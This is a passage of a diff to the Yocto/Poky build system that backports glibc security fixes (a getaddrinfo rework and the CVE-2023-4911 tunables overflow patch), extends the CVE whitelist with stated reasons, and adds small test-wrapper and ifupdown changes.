485+192.0.1.11 example.org
486+192.0.1.12 example.org
487+192.0.1.13 example.org
488+192.0.1.14 example.org
489+192.0.1.15 example.org
490+192.0.1.16 example.org
491+192.0.1.17 example.org
492+192.0.1.18 example.org
493+192.0.1.19 example.org
494+192.0.1.20 example.org
495+192.0.1.21 example.org
496+192.0.1.22 example.org
497+192.0.1.23 example.org
498+192.0.1.24 example.org
499+192.0.1.25 example.org
500+192.0.1.26 example.org
501+192.0.1.27 example.org
502+192.0.1.28 example.org
503+192.0.1.29 example.org
504+192.0.1.30 example.org
505+192.0.1.31 example.org
506+192.0.1.32 example.org
507+192.0.1.33 example.org
508+192.0.1.34 example.org
509+192.0.1.35 example.org
510+192.0.1.36 example.org
511+192.0.1.37 example.org
512+192.0.1.38 example.org
513+192.0.1.39 example.org
514+192.0.1.40 example.org
515+192.0.1.41 example.org
516+192.0.1.42 example.org
517+192.0.1.43 example.org
518+192.0.1.44 example.org
519+192.0.1.45 example.org
520+192.0.1.46 example.org
521+192.0.1.47 example.org
522+192.0.1.48 example.org
523+192.0.1.49 example.org
524+192.0.1.50 example.org
525+192.0.1.51 example.org
526+192.0.1.52 example.org
527+192.0.1.53 example.org
528+192.0.1.54 example.org
529+192.0.1.55 example.org
530+192.0.1.56 example.org
531+192.0.1.57 example.org
532+192.0.1.58 example.org
533+192.0.1.59 example.org
534+192.0.1.60 example.org
535+192.0.1.61 example.org
536+192.0.1.62 example.org
537+192.0.1.63 example.org
538+192.0.1.64 example.org
539+192.0.1.65 example.org
540+192.0.1.66 example.org
541+192.0.1.67 example.org
542+192.0.1.68 example.org
543+192.0.1.69 example.org
544+192.0.1.70 example.org
545+192.0.1.71 example.org
546+192.0.1.72 example.org
547+192.0.1.73 example.org
548+192.0.1.74 example.org
549+192.0.1.75 example.org
550+192.0.1.76 example.org
551+192.0.1.77 example.org
552+192.0.1.78 example.org
553+192.0.1.79 example.org
554+192.0.1.80 example.org
555+192.0.1.81 example.org
556+192.0.1.82 example.org
557+192.0.1.83 example.org
558+192.0.1.84 example.org
559+192.0.1.85 example.org
560+192.0.1.86 example.org
561+192.0.1.87 example.org
562+192.0.1.88 example.org
563+192.0.1.89 example.org
564+192.0.1.90 example.org
565+192.0.1.91 example.org
566+192.0.1.92 example.org
567+192.0.1.93 example.org
568+192.0.1.94 example.org
569+192.0.1.95 example.org
570+192.0.1.96 example.org
571+192.0.1.97 example.org
572+192.0.1.98 example.org
573+192.0.1.99 example.org
574+192.0.1.100 example.org
575+192.0.1.101 example.org
576+192.0.1.102 example.org
577+192.0.1.103 example.org
578+192.0.1.104 example.org
579+192.0.1.105 example.org
580+192.0.1.106 example.org
581+192.0.1.107 example.org
582+192.0.1.108 example.org
583+192.0.1.109 example.org
584+192.0.1.110 example.org
585+192.0.1.111 example.org
586+192.0.1.112 example.org
587+192.0.1.113 example.org
588+192.0.1.114 example.org
589+192.0.1.115 example.org
590+192.0.1.116 example.org
591+192.0.1.117 example.org
592+192.0.1.118 example.org
593+192.0.1.119 example.org
594+192.0.1.120 example.org
595+192.0.1.121 example.org
596+192.0.1.122 example.org
597+192.0.1.123 example.org
598+192.0.1.124 example.org
599+192.0.1.125 example.org
600+192.0.1.126 example.org
601+192.0.1.127 example.org
602+192.0.1.128 example.org
603+192.0.1.129 example.org
604+192.0.1.130 example.org
605+192.0.1.131 example.org
606+192.0.1.132 example.org
607+192.0.1.133 example.org
608+192.0.1.134 example.org
609+192.0.1.135 example.org
610+192.0.1.136 example.org
611+192.0.1.137 example.org
612+192.0.1.138 example.org
613+192.0.1.139 example.org
614+192.0.1.140 example.org
615+192.0.1.141 example.org
616+192.0.1.142 example.org
617+192.0.1.143 example.org
618+192.0.1.144 example.org
619+192.0.1.145 example.org
620+192.0.1.146 example.org
621+192.0.1.147 example.org
622+192.0.1.148 example.org
623+192.0.1.149 example.org
624+192.0.1.150 example.org
625+192.0.1.151 example.org
626+192.0.1.152 example.org
627+192.0.1.153 example.org
628+192.0.1.154 example.org
629+192.0.1.155 example.org
630+192.0.1.156 example.org
631+192.0.1.157 example.org
632+192.0.1.158 example.org
633+192.0.1.159 example.org
634+192.0.1.160 example.org
635+192.0.1.161 example.org
636+192.0.1.162 example.org
637+192.0.1.163 example.org
638+192.0.1.164 example.org
639+192.0.1.165 example.org
640+192.0.1.166 example.org
641+192.0.1.167 example.org
642+192.0.1.168 example.org
643+192.0.1.169 example.org
644+192.0.1.170 example.org
645+192.0.1.171 example.org
646+192.0.1.172 example.org
647+192.0.1.173 example.org
648+192.0.1.174 example.org
649+192.0.1.175 example.org
650+192.0.1.176 example.org
651+192.0.1.177 example.org
652+192.0.1.178 example.org
653+192.0.1.179 example.org
654+192.0.1.180 example.org
655+192.0.1.181 example.org
656+192.0.1.182 example.org
657+192.0.1.183 example.org
658+192.0.1.184 example.org
659+192.0.1.185 example.org
660+192.0.1.186 example.org
661+192.0.1.187 example.org
662+192.0.1.188 example.org
663+192.0.1.189 example.org
664+192.0.1.190 example.org
665+192.0.1.191 example.org
666+192.0.1.192 example.org
667+192.0.1.193 example.org
668+192.0.1.194 example.org
669+192.0.1.195 example.org
670+192.0.1.196 example.org
671+192.0.1.197 example.org
672+192.0.1.198 example.org
673+192.0.1.199 example.org
674+192.0.1.200 example.org
675+192.0.1.201 example.org
676+192.0.1.202 example.org
677+192.0.1.203 example.org
678+192.0.1.204 example.org
679+192.0.1.205 example.org
680+192.0.1.206 example.org
681+192.0.1.207 example.org
682+192.0.1.208 example.org
683+192.0.1.209 example.org
684+192.0.1.210 example.org
685+192.0.1.211 example.org
686+192.0.1.212 example.org
687+192.0.1.213 example.org
688+192.0.1.214 example.org
689+192.0.1.215 example.org
690+192.0.1.216 example.org
691+192.0.1.217 example.org
692+192.0.1.218 example.org
693+192.0.1.219 example.org
694+192.0.1.220 example.org
695+192.0.1.221 example.org
696+192.0.1.222 example.org
697+192.0.1.223 example.org
698+192.0.1.224 example.org
699+192.0.1.225 example.org
700+192.0.1.226 example.org
701+192.0.1.227 example.org
702+192.0.1.228 example.org
703+192.0.1.229 example.org
704+192.0.1.230 example.org
705+192.0.1.231 example.org
706+192.0.1.232 example.org
707+192.0.1.233 example.org
708+192.0.1.234 example.org
709+192.0.1.235 example.org
710+192.0.1.236 example.org
711+192.0.1.237 example.org
712+192.0.1.238 example.org
713+192.0.1.239 example.org
714+192.0.1.240 example.org
715+192.0.1.241 example.org
716+192.0.1.242 example.org
717+192.0.1.243 example.org
718+192.0.1.244 example.org
719+192.0.1.245 example.org
720+192.0.1.246 example.org
721+192.0.1.247 example.org
722+192.0.1.248 example.org
723+192.0.1.249 example.org
724+192.0.1.250 example.org
725+192.0.1.251 example.org
726+192.0.1.252 example.org
727+192.0.1.253 example.org
728+192.0.1.254 example.org
729diff --git a/sysdeps/posix/getaddrinfo.c b/sysdeps/posix/getaddrinfo.c
730index 18dccd5924..3d9bea60c6 100644
731--- a/sysdeps/posix/getaddrinfo.c
732+++ b/sysdeps/posix/getaddrinfo.c
733@@ -458,11 +458,6 @@ gaih_inet (const char *name, const struct gaih_service *service,
734
735 if (name != NULL)
736 {
737- at = alloca_account (sizeof (struct gaih_addrtuple), alloca_used);
738- at->family = AF_UNSPEC;
739- at->scopeid = 0;
740- at->next = NULL;
741-
742 if (req->ai_flags & AI_IDN)
743 {
744 char *out;
745@@ -473,13 +468,21 @@ gaih_inet (const char *name, const struct gaih_service *service,
746 malloc_name = true;
747 }
748
749- if (__inet_aton_exact (name, (struct in_addr *) at->addr) != 0)
750+ uint32_t addr[4];
751+ if (__inet_aton_exact (name, (struct in_addr *) addr) != 0)
752 {
753+ at = alloca_account (sizeof (struct gaih_addrtuple), alloca_used);
754+ at->scopeid = 0;
755+ at->next = NULL;
756+
757 if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET)
758- at->family = AF_INET;
759+ {
760+ memcpy (at->addr, addr, sizeof (at->addr));
761+ at->family = AF_INET;
762+ }
763 else if (req->ai_family == AF_INET6 && (req->ai_flags & AI_V4MAPPED))
764 {
765- at->addr[3] = at->addr[0];
766+ at->addr[3] = addr[0];
767 at->addr[2] = htonl (0xffff);
768 at->addr[1] = 0;
769 at->addr[0] = 0;
770@@ -505,49 +505,62 @@
771
772 if (req->ai_flags & AI_CANONNAME)
773 canon = name;
774+
775+ goto process_list;
776 }
777- else if (at->family == AF_UNSPEC)
778+
779+ char *scope_delim = strchr (name, SCOPE_DELIMITER);
780+ int e;
781+
782+ if (scope_delim == NULL)
783+ e = inet_pton (AF_INET6, name, addr);
784+ else
785+ e = __inet_pton_length (AF_INET6, name, scope_delim - name, addr);
786+
787+ if (e > 0)
788 {
789- char *scope_delim = strchr (name, SCOPE_DELIMITER);
790- int e;
791- if (scope_delim == NULL)
792- e = inet_pton (AF_INET6, name, at->addr);
793+ at = alloca_account (sizeof (struct gaih_addrtuple),
794+ alloca_used);
795+ at->scopeid = 0;
796+ at->next = NULL;
797+
798+ if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET6)
799+ {
800+ memcpy (at->addr, addr, sizeof (at->addr));
801+ at->family = AF_INET6;
802+ }
803+ else if (req->ai_family == AF_INET
804+ && IN6_IS_ADDR_V4MAPPED (addr))
805+ {
806+ at->addr[0] = addr[3];
807+ at->addr[1] = addr[1];
808+ at->addr[2] = addr[2];
809+ at->addr[3] = addr[3];
810+ at->family = AF_INET;
811+ }
812 else
813- e = __inet_pton_length (AF_INET6, name, scope_delim - name,
814- at->addr);
815- if (e > 0)
816 {
817- if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET6)
818- at->family = AF_INET6;
819- else if (req->ai_family == AF_INET
820- && IN6_IS_ADDR_V4MAPPED (at->addr))
821- {
822- at->addr[0] = at->addr[3];
823- at->family = AF_INET;
824- }
825- else
826- {
827- result = -EAI_ADDRFAMILY;
828- goto free_and_return;
829- }
830-
831- if (scope_delim != NULL
832- && __inet6_scopeid_pton ((struct in6_addr *) at->addr,
833- scope_delim + 1,
834- &at->scopeid) != 0)
835- {
836- result = -EAI_NONAME;
837- goto free_and_return;
838- }
839+ result = -EAI_ADDRFAMILY;
840+ goto free_and_return;
841+ }
842
843- if (req->ai_flags & AI_CANONNAME)
844- canon = name;
845+ if (scope_delim != NULL
846+ && __inet6_scopeid_pton ((struct in6_addr *) at->addr,
847+ scope_delim + 1,
848+ &at->scopeid) != 0)
849+ {
850+ result = -EAI_NONAME;
851+ goto free_and_return;
852 }
853+
854+ if (req->ai_flags & AI_CANONNAME)
855+ canon = name;
856+
857+ goto process_list;
858 }
859
860- if (at->family == AF_UNSPEC && (req->ai_flags & AI_NUMERICHOST) == 0)
861+ if ((req->ai_flags & AI_NUMERICHOST) == 0)
862 {
863- struct gaih_addrtuple **pat = &at;
864 int no_data = 0;
865 int no_inet6_data = 0;
866 service_user *nip;
867@@ -543,6 +559,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
868 enum nss_status status = NSS_STATUS_UNAVAIL;
869 int no_more;
870 struct resolv_context *res_ctx = NULL;
871+ bool do_merge = false;
872
873 /* If we do not have to look for IPv6 addresses or the canonical
874 name, use the simple, old functions, which do not support
875@@ -579,7 +596,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
876 result = -EAI_MEMORY;
877 goto free_and_return;
878 }
879- *pat = addrmem;
880+ at = addrmem;
881 }
882 else
883 {
884@@ -632,6 +649,8 @@ gaih_inet (const char *name, const struct gaih_service *service,
885 }
886
887 struct gaih_addrtuple *addrfree = addrmem;
888+ struct gaih_addrtuple **pat = &at;
889+
890 for (int i = 0; i < air->naddrs; ++i)
891 {
892 socklen_t size = (air->family[i] == AF_INET
893@@ -695,12 +714,6 @@ gaih_inet (const char *name, const struct gaih_service *service,
894
895 free (air);
896
897- if (at->family == AF_UNSPEC)
898- {
899- result = -EAI_NONAME;
900- goto free_and_return;
901- }
902-
903 goto process_list;
904 }
905 else if (err == 0)
906@@ -750,6 +763,22 @@
907
908 while (!no_more)
909 {
910+ /* Always start afresh; continue should discard previous results
911+ and the hosts database does not support merge. */
912+ at = NULL;
913+ free (canonbuf);
914+ free (addrmem);
915+ canon = canonbuf = NULL;
916+ addrmem = NULL;
917+ got_ipv6 = false;
918+
919+ if (do_merge)
920+ {
921+ __set_h_errno (NETDB_INTERNAL);
922+ __set_errno (EBUSY);
923+ break;
924+ }
925+
926 no_data = 0;
927 nss_gethostbyname4_r fct4 = NULL;
928
929@@ -744,12 +773,14 @@ gaih_inet (const char *name, const struct gaih_service *service,
930 {
931 while (1)
932 {
933- status = DL_CALL_FCT (fct4, (name, pat,
934+ status = DL_CALL_FCT (fct4, (name, &at,
935 tmpbuf->data, tmpbuf->length,
936 &errno, &h_errno,
937 NULL));
938 if (status == NSS_STATUS_SUCCESS)
939 break;
940+ /* gethostbyname4_r may write into AT, so reset it. */
941+ at = NULL;
942 if (status != NSS_STATUS_TRYAGAIN
943 || errno != ERANGE || h_errno != NETDB_INTERNAL)
944 {
945@@ -774,7 +805,9 @@ gaih_inet (const char *name, const struct gaih_service *service,
946 no_data = 1;
947
948 if ((req->ai_flags & AI_CANONNAME) != 0 && canon == NULL)
949- canon = (*pat)->name;
950+ canon = at->name;
951+
952+ struct gaih_addrtuple **pat = &at;
953
954 while (*pat != NULL)
955 {
956@@ -826,6 +859,8 @@ gaih_inet (const char *name, const struct gaih_service *service,
957
958 if (fct != NULL)
959 {
960+ struct gaih_addrtuple **pat = &at;
961+
962 if (req->ai_family == AF_INET6
963 || req->ai_family == AF_UNSPEC)
964 {
965@@ -917,6 +946,10 @@
966 if (nss_next_action (nip, status) == NSS_ACTION_RETURN)
967 break;
968
969+ /* The hosts database does not support MERGE. */
970+ if (nss_next_action (nip, status) == NSS_ACTION_MERGE)
971+ do_merge = true;
972+
973 if (nip->next == NULL)
974 no_more = -1;
975 else
976@@ -930,7 +969,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
977 }
978
979 process_list:
980- if (at->family == AF_UNSPEC)
981+ if (at == NULL)
982 {
983 result = -EAI_NONAME;
984 goto free_and_return;
985--
9862.39.3
diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch b/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch
new file mode 100644
index 0000000000..4d3146509a
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch
@@ -0,0 +1,63 @@
1From d2b77337f734fcacdfc8e0ddec14cf31a746c7be Mon Sep 17 00:00:00 2001
2From: Siddhesh Poyarekar <siddhesh@redhat.com>
3Date: Mon, 11 Sep 2023 18:53:15 -0400
4Subject: [PATCH v2] tunables: Terminate immediately if end of input is reached
5
6The string parsing routine may end up writing beyond bounds of tunestr
7if the input tunable string is malformed, of the form name=name=val.
8This gets processed twice, first as name=name=val and next as name=val,
9resulting in tunestr being name=name=val:name=val, thus overflowing
10tunestr.
11
12Terminate the parsing loop at the first instance itself so that tunestr
13does not overflow.
14---
15Changes from v1:
16
17- Also null-terminate tunestr before exiting.
18
19 elf/dl-tunables.c | 17 ++++++++++-------
20 1 file changed, 10 insertions(+), 7 deletions(-)
21
22Upstream-Status: Backport [git://sourceware.org/git/glibc.git]
23CVE: CVE-2023-4911
24
25diff --git a/elf/dl-tunables.c b/elf/dl-tunables.c
26index 8e7ee9df10..76cf8b9da3 100644
27--- a/elf/dl-tunables.c
28+++ b/elf/dl-tunables.c
29@@ -187,11 +187,7 @@ parse_tunables (char *tunestr, char *valstring)
30 /* If we reach the end of the string before getting a valid name-value
31 pair, bail out. */
32 if (p[len] == '\0')
33- {
34- if (__libc_enable_secure)
35- tunestr[off] = '\0';
36- return;
37- }
38+ break;
39
40 /* We did not find a valid name-value pair before encountering the
41 colon. */
42@@ -251,9 +247,16 @@ parse_tunables (char *tunestr, char *valstring)
43 }
44 }
45
46- if (p[len] != '\0')
47- p += len + 1;
48+ /* We reached the end while processing the tunable string. */
49+ if (p[len] == '\0')
50+ break;
51+
52+ p += len + 1;
53 }
54+
55+ /* Terminate tunestr before we leave. */
56+ if (__libc_enable_secure)
57+ tunestr[off] = '\0';
58 }
59 #endif
60
61--
622.41.0
63
diff --git a/meta/recipes-core/glibc/glibc/check-test-wrapper b/meta/recipes-core/glibc/glibc/check-test-wrapper
index f8e04e02d2..5cc993f718 100644
--- a/meta/recipes-core/glibc/glibc/check-test-wrapper
+++ b/meta/recipes-core/glibc/glibc/check-test-wrapper
@@ -2,6 +2,7 @@
2import sys 2import sys
3import os 3import os
4import subprocess 4import subprocess
5import resource
5 6
6env = os.environ.copy() 7env = os.environ.copy()
7args = sys.argv[1:] 8args = sys.argv[1:]
@@ -44,12 +45,20 @@ if targettype == "user":
44 qemuargs += ["-L", sysroot] 45 qemuargs += ["-L", sysroot]
45 qemuargs += ["-E", "LD_LIBRARY_PATH={}".format(":".join(libpaths))] 46 qemuargs += ["-E", "LD_LIBRARY_PATH={}".format(":".join(libpaths))]
46 command = qemuargs + args 47 command = qemuargs + args
48
49 # We've seen qemu-arm using up all system memory for some glibc
50 # tests e.g. nptl/tst-pthread-timedlock-lockloop
51 # Cap at 8GB since no test should need more than that
52 # (5GB adds 7 failures for qemuarm glibc test run)
53 limit = 8*1024*1024*1024
54 resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
55
47elif targettype == "ssh": 56elif targettype == "ssh":
48 host = os.environ.get("SSH_HOST", None) 57 host = os.environ.get("SSH_HOST", None)
49 user = os.environ.get("SSH_HOST_USER", None) 58 user = os.environ.get("SSH_HOST_USER", None)
50 port = os.environ.get("SSH_HOST_PORT", None) 59 port = os.environ.get("SSH_HOST_PORT", None)
51 60
52 command = ["ssh", "-o", "UserKnownHostsFile=/dev/null", "-o", "StrictHostKeyChecking=no"] 61 command = ["ssh", "-o", "UserKnownHostsFile=/dev/null", "-o", "StrictHostKeyChecking=no", "-o", "LogLevel=quiet"]
53 if port: 62 if port:
54 command += ["-p", str(port)] 63 command += ["-p", str(port)]
55 if not host: 64 if not host:
diff --git a/meta/recipes-core/glibc/glibc_2.31.bb b/meta/recipes-core/glibc/glibc_2.31.bb
index b75bbb4196..296c892994 100644
--- a/meta/recipes-core/glibc/glibc_2.31.bb
+++ b/meta/recipes-core/glibc/glibc_2.31.bb
@@ -1,7 +1,40 @@
1require glibc.inc 1require glibc.inc
2require glibc-version.inc 2require glibc-version.inc
3 3
4CVE_CHECK_WHITELIST += "CVE-2020-10029 CVE-2020-6096 CVE-2016-10228 CVE-2020-1751 CVE-2020-1752" 4CVE_CHECK_WHITELIST += "CVE-2020-10029 CVE-2020-6096 CVE-2016-10228 CVE-2020-1751 CVE-2020-1752 \
5 CVE-2021-27645 CVE-2021-3326 CVE-2020-27618 CVE-2020-29562 CVE-2019-25013 \
6 CVE-2022-23218 CVE-2022-23219 \
7"
8
9# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010022
10# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010023
11# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010024
12# Upstream glibc maintainers dispute there is any issue and have no plans to address it further.
13# "this is being treated as a non-security bug and no real threat."
14CVE_CHECK_WHITELIST += "CVE-2019-1010022 CVE-2019-1010023 CVE-2019-1010024"
15
16# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1010025
17# Allows for ASLR bypass so can bypass some hardening, not an exploit in itself, may allow
18# easier access for another. "ASLR bypass itself is not a vulnerability."
19# Potential patch at https://sourceware.org/bugzilla/show_bug.cgi?id=22853
20CVE_CHECK_WHITELIST += "CVE-2019-1010025"
21
22# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35942
23# The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash
24# or read arbitrary memory in parse_param (in posix/wordexp.c) when called with
25# an untrusted, crafted pattern, potentially resulting in a denial of service
26# or disclosure of information. Patch was backported to 2.31 branch already:
27# https://sourceware.org/git/?p=glibc.git;a=commit;h=4f0a61f75385c9a5879cbe7202042e88f692a3c8
28# which is already included in the dunfell branch of poky:
29# https://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?h=dunfell&id=e1e89ff7d75c3d2223f9e3bd875b9b0c5e15836b
30CVE_CHECK_WHITELIST += "CVE-2021-35942"
31
32# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-4527
33# This vulnerability was introduced in 2.36 by commit
34# f282cdbe7f436c75864e5640a409a10485e9abb2 resolv: Implement no-aaaa stub resolver option
35# so our version is not yet vulnerable
36# See https://sourceware.org/bugzilla/show_bug.cgi?id=30842
37CVE_CHECK_WHITELIST += "CVE-2023-4527"
5 38
6DEPENDS += "gperf-native bison-native make-native" 39DEPENDS += "gperf-native bison-native make-native"
7 40
@@ -41,9 +74,21 @@ SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
41 file://0027-intl-Emit-no-lines-in-bison-generated-files.patch \ 74 file://0027-intl-Emit-no-lines-in-bison-generated-files.patch \
42 file://0028-inject-file-assembly-directives.patch \ 75 file://0028-inject-file-assembly-directives.patch \
43 file://0029-locale-prevent-maybe-uninitialized-errors-with-Os-BZ.patch \ 76 file://0029-locale-prevent-maybe-uninitialized-errors-with-Os-BZ.patch \
44 file://CVE-2020-29562.patch \
45 file://CVE-2020-29573.patch \ 77 file://CVE-2020-29573.patch \
46 file://CVE-2019-25013.patch \ 78 file://CVE-2021-33574_1.patch \
79 file://CVE-2021-33574_2.patch \
80 file://CVE-2021-38604.patch \
81 file://0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch \
82 file://0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch \
83 file://0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch \
84 file://0033-elf-Add-test-case-for-BZ-19329.patch \
85 file://0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch \
86 file://0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \
87 file://0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \
88 file://0037-Avoid-deadlock-between-pthread_create-and-ctors.patch \
89 file://CVE-2023-0687.patch \
90 file://CVE-2023-4911.patch \
91 file://CVE-2023-4813.patch \
47 " 92 "
48S = "${WORKDIR}/git" 93S = "${WORKDIR}/git"
49B = "${WORKDIR}/build-${TARGET_SYS}" 94B = "${WORKDIR}/build-${TARGET_SYS}"
diff --git a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
index 52986e61c7..d1835c7a10 100644
--- a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
+++ b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
@@ -400,7 +400,7 @@ Index: ldconfig-native-2.12.1/ldconfig.c
400 return 0; 400 return 0;
401 } 401 }
402 402
403+#define REPORT_BUGS_TO "mailing list : poky@yoctoproject.org" 403+#define REPORT_BUGS_TO "mailing list : poky@lists.yoctoproject.org"
404 /* Print bug-reporting information in the help message. */ 404 /* Print bug-reporting information in the help message. */
405 static char * 405 static char *
406 more_help (int key, const char *text, void *input) 406 more_help (int key, const char *text, void *input)
diff --git a/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch b/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch
new file mode 100644
index 0000000000..e374d8ca59
--- /dev/null
+++ b/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch
@@ -0,0 +1,65 @@
1From e2263b58d7733835355d7b46c3caa96d911a4717 Mon Sep 17 00:00:00 2001
2From: Simon Schwarz <simon.schwarz@infoteam.de>
3Date: Fri, 6 Nov 2020 08:53:20 +0100
4Subject: [PATCH] inet6.defn: Added -1 option to dhclient on upping an
5 interface
6
7This prevents hangs on startup when no server is available and dhcpv6 is used
8
9Upstream-Status: Pending
10
11Signed-off-by: Simon Schwarz <simon.schwarz@infoteam.de>
12Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
13---
14 inet6.defn | 12 ++++++------
15 1 file changed, 6 insertions(+), 6 deletions(-)
16
17diff --git a/inet6.defn b/inet6.defn
18index 73dce24..25022e3 100644
19--- a/inet6.defn
20+++ b/inet6.defn
21@@ -29,9 +29,9 @@ method auto
22 if (var_set("accept_ra", ifd) && !var_true("accept_ra", ifd))
23 /sbin/ip link set dev %iface% up
24 /lib/ifupdown/wait-for-ll6.sh if (var_true("dhcp", ifd) && execable("/lib/ifupdown/wait-for-ll6.sh"))
25- /sbin/dhclient -6 -v -P -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
26+ /sbin/dhclient -6 -1 -v -P -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
27 if (var_true("dhcp", ifd) && execable("/sbin/dhclient") && var_true("request_prefix", ifd))
28- /sbin/dhclient -6 -v -S -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
29+ /sbin/dhclient -6 -1 -v -S -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
30 elsif (var_true("dhcp", ifd) && execable("/sbin/dhclient"))
31 echo 'No DHCPv6 client software found!' >&2; false \
32 elsif (var_true("dhcp", ifd))
33@@ -154,9 +154,9 @@ method dhcp
34 if (var_set("accept_ra", ifd) && !var_true("accept_ra", ifd))
35 /sbin/ip link set dev %iface% [[address %hwaddress%]] up
36 /lib/ifupdown/wait-for-ll6.sh if (execable("/lib/ifupdown/wait-for-ll6.sh"))
37- /sbin/dhclient -6 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -P -N -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
38+ /sbin/dhclient -6 -1 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -P -N -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
39 if (execable("/sbin/dhclient") && var_true("request_prefix", ifd))
40- /sbin/dhclient -6 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
41+ /sbin/dhclient -6 -1 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
42 elsif (execable("/sbin/dhclient"))
43 echo 'No DHCPv6 client software found!' >&2; false \
44 elsif (1)
45@@ -325,7 +325,7 @@ method dhcp
46
47 up
48 /sbin/ifconfig %iface% [[link %hwaddress%]] up
49- /sbin/dhclient -6 -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
50+ /sbin/dhclient -6 -1 -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
51 if (execable("/sbin/dhclient"))
52 echo 'No DHCPv6 client software found!' >&2; false \
53 elsif (1)
54@@ -397,7 +397,7 @@ method dhcp
55 up
56 [[Warning: Option hwaddress: %hwaddress% not yet supported]]
57 inetutils-ifconfig --interface %iface% --up
58- /sbin/dhclient -6 -pf /run/dhclient6.%iface///.%.pid -lf /var/lib/dhcp/dhclient6.%iface///.%.leases -I -df /var/lib/dhcp/dhclient.%iface///.%.leases %iface% \
59+ /sbin/dhclient -6 -1 -pf /run/dhclient6.%iface///.%.pid -lf /var/lib/dhcp/dhclient6.%iface///.%.leases -I -df /var/lib/dhcp/dhclient.%iface///.%.leases %iface% \
60 if (execable("/sbin/dhclient"))
61 echo 'No DHCPv6 client software found!' >&2; false \
62 elsif (1)
63--
642.17.1
65
diff --git a/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb b/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
index 53cb971d33..c3681defdc 100644
--- a/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
+++ b/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
@@ -1,4 +1,5 @@
1SUMMARY = "ifupdown: basic ifup and ifdown used by initscripts" 1SUMMARY = "ifupdown: basic ifup and ifdown used by initscripts"
2HOMEPAGE = "https://salsa.debian.org/debian/ifupdown"
2DESCRIPTION = "High level tools to configure network interfaces \ 3DESCRIPTION = "High level tools to configure network interfaces \
3This package provides the tools ifup and ifdown which may be used to \ 4This package provides the tools ifup and ifdown which may be used to \
4configure (or, respectively, deconfigure) network interfaces, based on \ 5configure (or, respectively, deconfigure) network interfaces, based on \
@@ -6,11 +7,12 @@ the file /etc/network/interfaces."
6LICENSE = "GPLv2" 7LICENSE = "GPLv2"
7LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" 8LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
8 9
9SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https \ 10SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https;branch=master \
